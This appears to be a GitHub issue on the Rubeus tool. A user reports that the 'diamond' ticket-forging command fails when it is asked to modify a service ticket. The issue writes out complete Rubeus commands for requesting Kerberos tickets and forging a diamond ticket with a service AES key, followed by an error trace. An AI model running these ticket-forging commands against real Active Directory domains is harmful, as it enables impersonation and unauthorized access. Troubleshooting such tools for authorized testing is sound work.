Diamond ticket TGS example not working #211
Description
Hello! Reading this article https://www.huntress.com/blog/recutting-the-kerberos-diamond-ticket and try to repeat a "Service ticket functionality" block. But it does not work as described. I do next things:
- Ask TGT of ligitimate account:
.\Rubeus.exe asktgt /user:mirror /password:mirror /nowrap
Ok, it good. Now, ask legitimate TGS:
.\Rubeus.exe asktgs /service:LDAP/dc1.domain.local,cifs/dc1.domain.local /ptt /ticket:doIE5DCCB....YWw= /nowrap
It is good to. And i try to modify TGS for cifs/dc1. For example, i got cmd from article
Rubeus.exe diamond /enctype:aes /domain:marvel.local /dc:earth-dc.marvel.local /ticketuser:thor /ticketuserid:1104 /ldap /ldapuser:loki /ldappassword:Mischief$ /nowrap /opsec /ticket:<output_of_service_ticket> /service:<SPN> /servicekey:<aes256_service_key>
Made next cmd. 6447b....37818ef - it is AES256 of DC1$ account (as service account). 1118 - id of "mirror" user.
.\Rubeus.exe diamond /enctype:aes /domain:domain.local /dc:dc1.domain.local /ticketuser:mirror /ticketuserid:1118 /ldap /ldapuser:mirror /ldappassword:mirror /nowrap /service:cifs/dc1.domain.local /servicekey:6447b...37818ef /ticket:doIFK......
I expected stdout about ldap connect (as in article), but not. It fails on AS-REQ step. Why Rubeus doing this? Ready TGS given to him, but Rubeus need TGT?
[*] Action: Diamond Ticket
[] Using domain controller: dc1.domain.local (192.168.56.3)
[] Using aes256_cts_hmac_sha1 hash:
[*] Building AS-REQ (w/ preauth) for: 'domain.local'[!] Unhandled Rubeus exception:
System.ComponentModel.Win32Exception (0x80004005): Unknown error (0xc000000d)
at Rubeus.Crypto.KerberosEncrypt(KERB_ETYPE eType, Int32 keyUsage, Byte[] key, Byte[] data)
at Rubeus.PA_DATA..ctor(String keyString, KERB_ETYPE etype)
at Rubeus.AS_REQ..ctor(String keyString, KERB_ETYPE etype, Boolean opsec, Boolean pac)
at Rubeus.AS_REQ.NewASReq(String userName, String domain, String keyString, KERB_ETYPE etype, Boolean opsec, Boolean changepw, Boolean pac, String service, KERB_ETYPE suppEtype, String principalType)
at Rubeus.Ask.TGT(String userName, String domain, String keyString, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, Boolean describe, Boolean opsec, String servicekey, Boolean changepw, Boolean pac, String proxyUrl, String service, KERB_ETYPE suppEtype, String principalType)
at Rubeus.ForgeTickets.DiamondTicket(String userName, String domain, String keyString, KERB_ETYPE etype, String outfile, Boolean ptt, String domainController, LUID luid, String krbKey, String ticketUser, String groups, Int32 ticketUserId, String sids)
at Rubeus.Commands.Diamond.Execute(Dictionary2 arguments) at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments)
at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
PS C:\Users\rdpuser>
Error gone if i add params /user, /password, and Rubeus really ask TGT and fail because i dont give a krbtgt key. It is wrong behavior. He must modify TGS, not require new TGT.
How can i fix it? Is i doing something wrong? Or may be i may roll back some commits and get Rubeus without this error (version article author work with)?
Thanks.